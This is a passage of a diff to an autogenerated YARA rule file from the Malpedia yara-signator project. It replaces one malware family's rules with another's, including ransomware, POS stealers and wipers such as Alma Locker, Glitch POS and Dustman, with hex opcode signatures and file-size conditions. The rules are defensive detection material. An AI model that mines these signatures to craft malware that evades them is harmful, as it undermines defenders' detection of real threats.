-		$sequence_6 = { 668b8c24a0020000 6685c9 741b 8d9424a0020000 0fb7c9 2bd0 668908 }
-		$sequence_7 = { ff55b8 c745cc00000000 837dcc00 0f85a2000000 c745c400000000 8d4dc4 51 }
-		$sequence_8 = { 75f8 668b8c24a0020000 6685c9 741b 8d9424a0020000 }
-		$sequence_9 = { 8b55f8 8b45fc 0302 8b4de0 0fb711 81e2ff0f0000 }
+		$sequence_0 = { 3bd1 72f2 c6043100 8d5e12 668b4712 33c9 66894610 }
+		$sequence_1 = { 88840d80fdffff 41 83f950 72ec 8d9580fdffff 8d8d98f1ffff }
+		$sequence_2 = { 83c308 03ca 894dc8 8b7904 83ef08 d1ef }
+		$sequence_3 = { 8d8d2cfbffff e8???????? 8d8d2cfbffff e8???????? 33c9 }
+		$sequence_4 = { 8be5 5d c20400 56 8b35???????? 6a00 ffd6 }
+		$sequence_5 = { 8d8d28f5ffff e8???????? 8d8d28f5ffff e8???????? 33c9 }
+		$sequence_6 = { 46 807c35c000 75f8 33ff 90 e8???????? 33d2 }
+		$sequence_7 = { 8b7dcc 85ff 7426 8b45d0 33c9 8d1c00 85db }
+		$sequence_8 = { 8d4df8 51 0f47c2 50 8d8584fbffff 50 ff75f0 }
+		$sequence_9 = { e8???????? 33c9 66660f1f840000000000 8a840d70edffff 88840d60ffffff 41 83f950 }
 
 	condition:
-		7 of them and filesize < 33792
+		7 of them and filesize < 101376
 }
-rule MALPEDIA_Win_Alma_Locker_Auto : FILE
+rule MALPEDIA_Win_Glitch_Pos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ce864cf3-8ed9-5a77-84b9-9123b66a46f1"
+		id = "c93e3d6a-335e-54cb-bdcc-97351033393c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_locker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.alma_locker_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.glitch_pos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.glitch_pos_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "8cabf41a3f65a5dd2317b51829855a0a62bf40db235945e5f426bc09d1925bbb"
+		logic_hash = "21a834f4b54c4ad338d28c072f57ab5cdab3b8ecf8da5350f54289b7483fd1b9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -129425,32 +129328,32 @@ rule MALPEDIA_Win_Alma_Locker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 750d e8???????? 84c0 0f8461010000 e8???????? 833d????????00 }
-		$sequence_1 = { 8b08 ff5108 8b45ac 50 8b08 ff5108 }
-		$sequence_2 = { c745e800000000 c645d800 720b ff75c0 e8???????? 83c404 83ec18 }
-		$sequence_3 = { 8b85f8fbffff 0f438de8fbffff ffb538f9ffff c785e4fbffff0f000000 c785e0fbffff00000000 8d0441 c685d0fbffff00 }
-		$sequence_4 = { 1bc0 f7d8 0f854affffff 8b8580fbffff 51 83c0fe 8d8d70fbffff }
-		$sequence_5 = { 8d558c c645fc04 8d4dbc e8???????? 83c404 c645fc06 837db810 }
-		$sequence_6 = { 33c0 c645fc0d 33c9 66a3???????? 66390d???????? 8bc6 c705????????07000000 }
-		$sequence_7 = { 0f8412000000 83a5e0fffefffe 8b8de8fffeff e9???????? c3 8b542408 8d420c }
-		$sequence_8 = { c78598fbffff00000000 c7859cfbffff0f000000 720e ffb558fbffff e8???????? 83c404 83bdccfbffff08 }
-		$sequence_9 = { 83bd9cfbffff10 c78584fbffff0f000000 c78580fbffff00000000 c68570fbffff00 720e ffb588fbffff }
+		$sequence_0 = { 8b00 ff7508 ff9010030000 50 8d45c4 50 e8???????? }
+		$sequence_1 = { 8b4508 8b4034 83c001 0f80b9060000 8b4d08 894134 8b4508 }
+		$sequence_2 = { 8b00 ff7508 ff902c070000 6683bd2cffffffff 0f85f7030000 8b4508 8b00 }
+		$sequence_3 = { e8???????? 8945dc 8d45e0 50 8b450c 668b00 }
+		$sequence_4 = { 50 8b8554ffffff 8b00 ffb554ffffff ff5054 }
+		$sequence_5 = { 668985f0feffff 8d8568ffffff 50 8d8578ffffff 50 8d4598 50 }
+		$sequence_6 = { 8d4588 50 8b856cffffff 8b00 ffb56cffffff ff90d8000000 }
+		$sequence_7 = { ffb5dcfeffff e8???????? 89852cfeffff eb07 83a52cfeffff00 8b45c0 }
+		$sequence_8 = { 83658000 8d45dc 50 8d45d8 50 8d45e0 }
+		$sequence_9 = { ff75d8 e8???????? dc9d68ffffff dfe0 }
 
 	condition:
-		7 of them and filesize < 335872
+		7 of them and filesize < 1024000
 }
-rule MALPEDIA_Win_Atharvan_Auto : FILE
+rule MALPEDIA_Win_Cruloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "dd431719-94ae-5231-a751-29bdaf0704ba"
+		id = "39947838-03a3-5a24-945d-6e866d043993"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atharvan"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.atharvan_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cruloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cruloader_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "19e37c8e9adb39c411ba39c49044a47b42d2c1f02c40c66504cd4acf945815d9"
+		logic_hash = "4307b8e0f195ebffc58740c34a8819f9896c989908200e4e4f90e094ceef34c2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -129464,34 +129367,34 @@ rule MALPEDIA_Win_Atharvan_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f6d1 80c103 8848ff 4883ea01 75eb 448b8504010000 488bd5 }
-		$sequence_1 = { 4885c0 7441 48c7c1ffffffff 0f1f4000 48ffc1 803c0800 }
-		$sequence_2 = { 895128 488d0d9fc10000 488b45d8 488908 488d0d915b0100 488b45d8 }
-		$sequence_3 = { 0fb601 84c0 75f1 488d4c2468 b0c2 }
-		$sequence_4 = { 48c1f806 4c8d0504f50000 83e23f 488d14d2 498b04c0 f644d03801 7424 }
-		$sequence_5 = { ff15???????? 85c0 0f842f010000 b901001000 }
-		$sequence_6 = { 488b08 488d05b8330100 483901 7408 488b09 e8???????? 488b03 }
-		$sequence_7 = { ff15???????? 488bd8 4883f8ff 742b 448d460e 488bc8 }
-		$sequence_8 = { 4533d2 498bd2 4885ff 7e1f 4c8d05179dfeff 4b8b8ce070550200 }
-		$sequence_9 = { 458be0 c7442469cf968ed8 4c8bea c744246d8dc8c4cf }
+		$sequence_0 = { 53 56 57 8b7d08 eb6f 8b07 8d1c85605c4100 }
+		$sequence_1 = { 8b413c 0f104508 53 56 }
+		$sequence_2 = { 8bcf 83e73f c1f906 6bd738 8b0c8dd85e4100 c644112800 85f6 }
+		$sequence_3 = { 6bc618 57 8db8e8604100 57 ff15???????? }
+		$sequence_4 = { c0c104 80f19a 884c15f0 42 3bd0 }
+		$sequence_5 = { 8b75e4 3bf7 7523 baf63f4890 b901000000 }
+		$sequence_6 = { 33f6 898de0fcffff 898500fdffff 85db }
+		$sequence_7 = { 894de0 8b049dd85e4100 f644082801 7469 }
+		$sequence_8 = { 8b8514fdffff 898d0cfdffff 0fb74006 898508fdffff 85c0 7433 83c108 }
+		$sequence_9 = { b902000000 e8???????? ba241d19e5 a3???????? }
 
 	condition:
-		7 of them and filesize < 348160
+		7 of them and filesize < 196608
 }
-rule MALPEDIA_Win_Polyglot_Ransom_Auto : FILE
+rule MALPEDIA_Win_Iconic_Stealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "bf3c0440-2d73-51e5-9d4d-22d8d3fb589d"
+		id = "7673e219-b974-5ee5-b8e5-79ce461f9ab7"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.polyglot_ransom"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.polyglot_ransom_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.iconic_stealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.iconic_stealer_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "5cf22f105101e70a8b28d9346158b196300696ba529297d761e1115a7c957230"
+		logic_hash = "5bc33a8c1cdbea6882940424bec9a55b2f154b2fa412fc3e5ed34989f79a9444"
 		score = 75
-		quality = 71
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -129503,32 +129406,32 @@ rule MALPEDIA_Win_Polyglot_Ransom_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 207370 65676e 657265 2064656c 20636f 6d 7075 }
-		$sequence_1 = { 6a05 68f3000000 8d45e4 68???????? 50 e8???????? 83c434 }
-		$sequence_2 = { 8d8508faffff 68???????? 50 e8???????? 8d8508f2ffff 50 8d8508faffff }
-		$sequence_3 = { 740a c783ac00000007000000 39bb1c010100 7708 39bb18010100 7666 39bb20010100 }
-		$sequence_4 = { 8365e800 8365ec00 837dfc00 7522 837d0800 740e 8b7d08 }
-		$sequence_5 = { 50 8d8538d9ffff 50 e8???????? 8bc3 50 8d8538d9ffff }
-		$sequence_6 = { e8???????? 8d4564 50 8d45ec 50 e8???????? }
-		$sequence_7 = { 7970 7428 293b 223e 44 657363 69667261723c2f }
-		$sequence_8 = { 807b1d00 8d45e8 50 7445 ff7308 8365e800 680a202600 }
-		$sequence_9 = { c3 85f6 7504 6a9a 58 c3 8b8608010000 }
+		$sequence_0 = { ebc9 4885f6 740f ba68000000 488bce e8???????? eb0a }
+		$sequence_1 = { 498b4a18 8b4148 034144 7912 458bc6 498bd2 e8???????? }
+		$sequence_2 = { ff8bdc000000 c687c500000003 40387367 7407 c7473407000000 b805000000 394734 }
+		$sequence_3 = { e9???????? f7430400000001 488b0e 4489642454 48894c2468 4c896598 0fb64164 }
+		$sequence_4 = { e9???????? 41f7450400000100 0f8480020000 4889bc2458010000 498b3e 4c396648 7414 }
+		$sequence_5 = { e8???????? 488be8 4885c0 0f849d020000 80783f02 0f8493020000 488b542438 }
+		$sequence_6 = { ff15???????? 85c0 0f8494000000 39bc2480000000 0f8487000000 498bd6 4c8d1d8d6c0300 }
+		$sequence_7 = { b8e08004e0 48094330 44896374 4c89a378020000 4c89a370020000 4c89a380020000 4c89a330020000 }
+		$sequence_8 = { 744d 4c8bc1 eb48 4c8d442440 4889742440 488d150c780300 4489742448 }
+		$sequence_9 = { 4d85c0 741a 410fb74010 6685c0 7f05 6603c8 eb0b }
 
 	condition:
-		7 of them and filesize < 1392640
+		7 of them and filesize < 2401280
 }
-rule MALPEDIA_Win_Hardrain_Auto : FILE
+rule MALPEDIA_Win_Industrial_Spy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "25398ca8-a4b7-5603-875f-04e6efbaac2b"
+		id = "49532f61-1558-5e03-9771-9daa1443f81c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hardrain"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hardrain_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.industrial_spy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.industrial_spy_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "bee47eae17e07c9e5633e3c8b1ddd3c37741eaa6fac55010942faf387fc2a537"
+		logic_hash = "09d68278c920c888a9a9161c0ac726f167f616f36cff9042eab3321dfe0c396f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -129542,32 +129445,32 @@ rule MALPEDIA_Win_Hardrain_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83ec0c 8b4c2414 8b442410 56 57 8b7904 8b7004 }
-		$sequence_1 = { 5e 81c418010000 c20400 83ec0c }
-		$sequence_2 = { 83ec10 56 57 8b7c241c 6685ff }
-		$sequence_3 = { 52 e8???????? 33c0 b910000000 89442448 }
-		$sequence_4 = { 5e 83c418 c3 33c9 33c0 8b542424 894c2410 }
-		$sequence_5 = { c3 68ffffff7f 56 ff15???????? 85c0 }
-		$sequence_6 = { 32d0 88143e 46 3bf3 7cea 5f 8d4c2408 }
-		$sequence_7 = { 52 8bce e8???????? 85c0 7413 6a16 8d44241c }
-		$sequence_8 = { e8???????? 50 8bce e8???????? 85c0 0f84da000000 }
-		$sequence_9 = { 5d b801000000 5b 59 c20400 8b4c2410 895910 }
+		$sequence_0 = { 03c8 43890c26 3bc8 7302 ffc7 037c242c }
+		$sequence_1 = { 33c9 ff15???????? 8b15???????? 4c8d0577020200 498904d0 ffc2 8915???????? }
+		$sequence_2 = { 418bd9 498bf8 8bf2 4c8d0d2d9c0000 488be9 4c8d051b9c0000 }
+		$sequence_3 = { 4403d3 41c1ca0c 4503d1 4133c2 054239faff 0345d4 03d0 }
+		$sequence_4 = { 8bc1 488bce 4803d0 e8???????? 33c0 eb0c b801040000 }
+		$sequence_5 = { 442bc9 f7d1 443bc9 418bc0 0f46d6 c1e010 }
+		$sequence_6 = { 0345c0 418d91442229f4 03d0 448d8997ff2a43 418bc2 c1c206 f7d0 }
+		$sequence_7 = { 418d4a01 418bc1 c1e810 03c2 }
+		$sequence_8 = { 33c0 eb3d 452bd3 4533c0 4585c9 742f 482bf9 }
+		$sequence_9 = { 488d0d4bf40000 48894b48 4963d0 c6435401 e8???????? eb18 4885c9 }
 
 	condition:
-		7 of them and filesize < 368640
+		7 of them and filesize < 339968
 }
-rule MALPEDIA_Win_Tofsee_Auto : FILE
+rule MALPEDIA_Win_Elise_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5ec9c841-1425-53ec-b84c-3ac0dbb9536e"
+		id = "08b1c424-ccca-5509-994b-c3215e83e8dc"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tofsee"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tofsee_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.elise"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.elise_auto.yar#L1-L199"
 		license_url = "N/A"
-		logic_hash = "a6df759b6d2a0e48c553f18c939a733af072972aeea2dd4dbecf6d38d79b3015"
+		logic_hash = "70b08762b10b71d08f89704ff70572a2b0da8c94488cb175a27749246468d125"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -129581,32 +129484,42 @@ rule MALPEDIA_Win_Tofsee_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6864006400 ff7510 ff15???????? 85c0 7404 }
-		$sequence_1 = { 5e c3 55 8bec 83ec14 8365f400 8365f800 }
-		$sequence_2 = { 57 8d8580fbffff eb68 03d8 81fbf4010000 0f8f92000000 }
-		$sequence_3 = { 85c9 8816 7ff0 017dfc eb13 8b45ec }
-		$sequence_4 = { 51 50 53 e8???????? 8b4c241c 8b413c 56 }
-		$sequence_5 = { ff75fc e8???????? 83c40c 56 ff75f8 8d45d4 6a03 }
-		$sequence_6 = { 8b4e10 85c9 7412 33d2 f7f1 894df8 8945fc }
-		$sequence_7 = { e9???????? 68???????? ff7514 e8???????? 59 59 83fb05 }
-		$sequence_8 = { 391e 895dbc 8975f4 7e7f 83c608 bf???????? 8b46fc }
-		$sequence_9 = { 0f8498000000 8b4510 8938 8b450c 8d4801 8a10 40 }
+		$sequence_0 = { 1bc0 83e0fe 83c00b 8945f8 8b45f4 40 50 }
+		$sequence_1 = { 4b 8d3470 75ed 5b }
+		$sequence_2 = { ab 75d2 5f 5e 5b c3 }
+		$sequence_3 = { 7cf5 33c9 888f00010000 888f01010000 }
+		$sequence_4 = { 8b491c 83c60c 83c110 8945fc }
+		$sequence_5 = { 8d1c58 d3e0 0945f4 ff45f8 }
+		$sequence_6 = { c3 55 8bec 51 51 53 8d5f10 }
+		$sequence_7 = { 888f00010000 888f01010000 8bf7 8945f8 }
+		$sequence_8 = { 57 6a22 50 894608 ff15???????? }
+		$sequence_9 = { 034e3c b800030000 d3e0 33c9 6a02 }
+		$sequence_10 = { 56 57 b99a000000 8d7510 }
+		$sequence_11 = { e8???????? 83c40c 8d4580 50 8d4588 }
+		$sequence_12 = { 33c0 e9???????? 833d????????00 7405 e8???????? 83c8ff }
+		$sequence_13 = { ff75ec 0fb6843794010000 99 53 52 50 }
+		$sequence_14 = { 0145f0 6a00 6800010000 ff75ec 1155f4 53 }
+		$sequence_15 = { 5b 85ff 7415 0fb616 33d0 23d1 c1e808 }
+		$sequence_16 = { 50 ff7580 e8???????? 85c0 }
+		$sequence_17 = { 6a20 e8???????? 59 8bd8 }
+		$sequence_18 = { 59 59 33c0 e9???????? 8b35???????? 6a04 }
+		$sequence_19 = { 8bd7 c1ea03 53 0fb61e 33d8 23d9 c1e808 }
 
 	condition:
-		7 of them and filesize < 147456
+		7 of them and filesize < 204800
 }
-rule MALPEDIA_Win_Mulcom_Auto : FILE
+rule MALPEDIA_Win_Halfrig_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "796c69f9-5b53-545d-88e3-bfd165a4b278"
+		id = "42e8a2a1-259b-540e-bb50-a68bd513fd92"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mulcom"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mulcom_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.halfrig"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.halfrig_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "2762a73c90997100242e2050e0b97b2b7a616be77c2385bca6805b6497e289e6"
+		logic_hash = "adc9aecc9470ee0c91f95fb542745149148c07ba82848cc511591fd05aa26a6e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -129620,32 +129533,32 @@ rule MALPEDIA_Win_Mulcom_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? b801000000 488b8d70050000 4833cc e8???????? 4c8d9c2480060000 498b5b28 }
-		$sequence_1 = { 488d4b27 4883c8ff 483bcb 480f46c8 e8???????? 488bc8 4885c0 }
-		$sequence_2 = { 488d4398 483bc6 75c8 488b5c2430 488b4c2440 482bcb 48b80dc3300cc3300cc3 }
-		$sequence_3 = { 0f86cd000000 8bc6 4c8d3440 4c8b7c2438 4c8d4dff }
-		$sequence_4 = { 488b03 48634804 4803cb 4533c0 8bd7 e8???????? 90 }
-		$sequence_5 = { 488d4c2440 e8???????? 488d5530 48837d4810 480f435530 8b5d40 448bc3 }
-		$sequence_6 = { eb73 4c8d442430 ba0e000000 488bcf ff15???????? 85c0 750b }
-		$sequence_7 = { 55 488bec 4883ec70 488b05???????? 4833c4 488945f0 488955d0 }
-		$sequence_8 = { 498b4110 d020 c3 81fa80000000 731e 4183f804 7318 }
-		$sequence_9 = { 751f 488b0d???????? 488d1d55e80200 483bcb 740c e8???????? 48891d???????? }
+		$sequence_0 = { 0f8ea3000000 488d0daf800800 e8???????? 833d????????ff 0f858a000000 488d542420 488d8530030000 }
+		$sequence_1 = { 488d542420 e8???????? 488d0db8bd0700 e8???????? 40383d???????? }
+		$sequence_2 = { 4c893d???????? 488d8d30030000 488d05acd70200 488bd6 660f1f840000000000 488d8980000000 0f1000 }
+		$sequence_3 = { 3905???????? 0f8ea3000000 488d0ddf8d0700 e8???????? 833d????????ff 0f858a000000 488d542420 }
+		$sequence_4 = { 0f8ea3000000 488d0d2f6c0700 e8???????? 833d????????ff 0f858a000000 488d542420 4c8bc6 }
+		$sequence_5 = { 4983f815 72db 408835???????? 418b06 4c898b50040000 4088b358040000 3905???????? }
+		$sequence_6 = { 0f1003 488d542420 488bcd 0f29442420 e8???????? 0fb6d0 488d5b10 }
+		$sequence_7 = { 8801 418b06 3905???????? 0f8ea3000000 488d0dcf4f0700 e8???????? 833d????????ff }
+		$sequence_8 = { 418b06 4c898ba0040000 4088b3a8040000 3905???????? 7e4e 488d0d34700400 e8???????? }
+		$sequence_9 = { c705????????6990e984 c705????????3d6d27f5 e8???????? 403835???????? 4c8d0d0e7b0400 7438 }
 
 	condition:
-		7 of them and filesize < 867328
+		7 of them and filesize < 1369088
 }
-rule MALPEDIA_Win_Sslmm_Auto : FILE
+rule MALPEDIA_Win_Dustman_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d8086894-ce35-51e5-80fd-c0d5178aba78"
+		id = "371d6ab3-949b-5c9d-8033-67b6c55ea566"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sslmm"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sslmm_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dustman"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dustman_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "a85823710a9c9f3b9c72213ada570b2364c16fc9f2cafb50a35e2a98adedaa0a"
+		logic_hash = "b063597b5a4ae400c5fb648bc847f945a242473e9377f95d15455828ca13e94a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -129659,32 +129572,32 @@ rule MALPEDIA_Win_Sslmm_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 55 50 51 8bcb e8???????? 85c0 0f854d010000 }
-		$sequence_1 = { 51 03ee 55 50 e8???????? 8b442478 }
-		$sequence_2 = { 8bca 83e103 f3aa 8b842480000000 8b4c2420 2bc6 }
-		$sequence_3 = { 5b 81c45c020000 c3 8b1d???????? 68???????? 56 }
-		$sequence_4 = { 81ecc8000000 53 8bd9 8b8c24d8000000 55 }
-		$sequence_5 = { 51 6a00 8d93dc000000 50 52 }
-		$sequence_6 = { 33c0 5e 81c4ac010000 c21000 }
-		$sequence_7 = { ff5204 33c0 5e c20c00 6a00 }
-		$sequence_8 = { 68c8000000 8bf1 6a00 ffd7 8b1d???????? }
-		$sequence_9 = { 83c404 40 50 53 6aff 57 6a00 }
+		$sequence_0 = { 8bd9 4c8d0dedb20000 b902000000 4c8d05d9b20000 }
+		$sequence_1 = { 884810 488b4d88 0fb60c01 884811 488b4d90 0fb60c01 884812 }
+		$sequence_2 = { c3 488d055d954101 c3 488d054d954101 c3 }
+		$sequence_3 = { 4c8d9db1010000 4903cb 48894d88 488bca 492bca }
+		$sequence_4 = { 4d8be1 498be8 4c8bea 4b8b8cfe40c80100 4c8b15???????? 4883cfff }
+		$sequence_5 = { 492bca 4c8d9dc4010000 4903cb 48894d20 488bca 492bca 4c8d9dc5010000 }
+		$sequence_6 = { c4c173590cc1 4c8d0d05750000 c5f359c1 c5fb101d???????? c5fb102d???????? c4e2f1a91d???????? c4e2f1a92d???????? }
+		$sequence_7 = { 0fb68525020000 48c1e028 4c0bd0 0fb68526020000 48c1e030 4c0bd0 0fb68527020000 }
+		$sequence_8 = { e8???????? 4883f8ff 7524 ff15???????? 488d4c2420 }
+		$sequence_9 = { e9???????? 4d8bb4f6d0320100 33d2 498bce 41b800080000 }
 
 	condition:
-		7 of them and filesize < 188416
+		7 of them and filesize < 368640
 }
-rule MALPEDIA_Win_Yayih_Auto : FILE
+rule MALPEDIA_Win_Divergent_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "20c4d84b-adf0-50ee-81d6-f74bed13f2d6"
+		id = "0e7b7156-a784-541b-bc2e-90cf2a4a8de0"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yayih"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.yayih_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.divergent"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.divergent_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "ccf9d220b177854895c46141d0b55d3d71e3c288e2342d7f6d4b5f34327dab2f"
+		logic_hash = "59dd95ddff9efda2ca5f59f400b3973c8f58905843f6145e813b39dc6d7537d1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -129698,32 +129611,71 @@ rule MALPEDIA_Win_Yayih_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a01 8d459c 5f 6689b548ffffff 50 }
-		$sequence_1 = { ff75f8 ff15???????? 8d85bcd8ffff 50 e8???????? 80bc05bbd8ffff3e }
-		$sequence_2 = { 8a1c33 80eb03 ff4508 8819 49 }
-		$sequence_3 = { e8???????? 59 59 8d85f0fdffff 68???????? }
-		$sequence_4 = { 7517 ff45e0 817de050c30000 0f8cecfdffff 33f6 e9???????? 6a44 }
-		$sequence_5 = { 83650800 8b550c 8d78ff 59 85ff }
-		$sequence_6 = { 8d8570fdffff 68???????? 50 ff15???????? 83c410 3bc3 894508 }
-		$sequence_7 = { 50 56 ff15???????? bf04010000 }
-		$sequence_8 = { c785f0feffff28000000 6a0c 8d45d0 56 50 e8???????? 6801200000 }
-		$sequence_9 = { 68???????? 50 e8???????? 59 8d85c0feffff 59 50 }
+		$sequence_0 = { ff15???????? 85c0 781e 8d85f8fdffff 50 }
+		$sequence_1 = { 50 e8???????? 59 59 8b0b 8bd7 eb08 }
+		$sequence_2 = { 6aff 0f44c1 50 57 ff15???????? 8bf0 85f6 }
+		$sequence_3 = { 68???????? eb37 68???????? eb30 68???????? eb29 68???????? }
+		$sequence_4 = { f77dfc 43 8aca 81fb00010000 7cba 5f 5e }
+		$sequence_5 = { 786e ff75e0 ff15???????? 40 50 e8???????? 8bf0 }
+		$sequence_6 = { eb03 8b7dfc 8b36 85f6 0f8574ffffff }
+		$sequence_7 = { e8???????? ff730c 68???????? 56 e8???????? f20f104310 83c420 }
+		$sequence_8 = { 894dd4 894dd8 ff15???????? 33db 85c0 0f99c3 85db }
+		$sequence_9 = { d9e0 dec1 dd5df8 dd45f8 8be5 5d c3 }
 
 	condition:
-		7 of them and filesize < 57344
+		7 of them and filesize < 212992
 }
-rule MALPEDIA_Win_Mariposa_Auto : FILE
+rule MALPEDIA_Win_Hacksfase_Auto : FILE
+{
+	meta:
+		description = "autogenerated rule brought to you by yara-signator"
+		author = "Felix Bilstein - yara-signator at cocacoding dot com"
+		id = "729ac06e-5cdf-534d-872e-f45399aff424"
+		date = "2026-01-05"
+		modified = "2026-01-06"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hacksfase"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hacksfase_auto.yar#L1-L124"
+		license_url = "N/A"
+		logic_hash = "475d936eb0e74e3fe48740a165f50322f1d0bfb51d9d93ce37cd5fe8ac260ab9"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		version = "1"
+		tool = "yara-signator v0.6.0"
+		signator_config = "callsandjumps;datarefs;binvalue"
+		malpedia_rule_date = "20260105"
+		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
+		malpedia_version = "20251219"
+		malpedia_license = "CC BY-SA 4.0"
+		malpedia_sharing = "TLP:WHITE"
+
+	strings:
+		$sequence_0 = { 8965e8 33db 895de0 895de4 895dd8 895ddc 895dfc }
+		$sequence_1 = { 56 6a02 68???????? 56 ff500c }
+		$sequence_2 = { 56 ffd3 50 ffd5 56 ff15???????? }
+		$sequence_3 = { 89442418 894c241c 6a00 6a00 6a00 6a06 6a01 }
+		$sequence_4 = { 3975b4 7416 3975bc 7411 ff75b4 8bcb }
+		$sequence_5 = { 7479 bf02000000 8b442414 40 3bc7 89442414 }
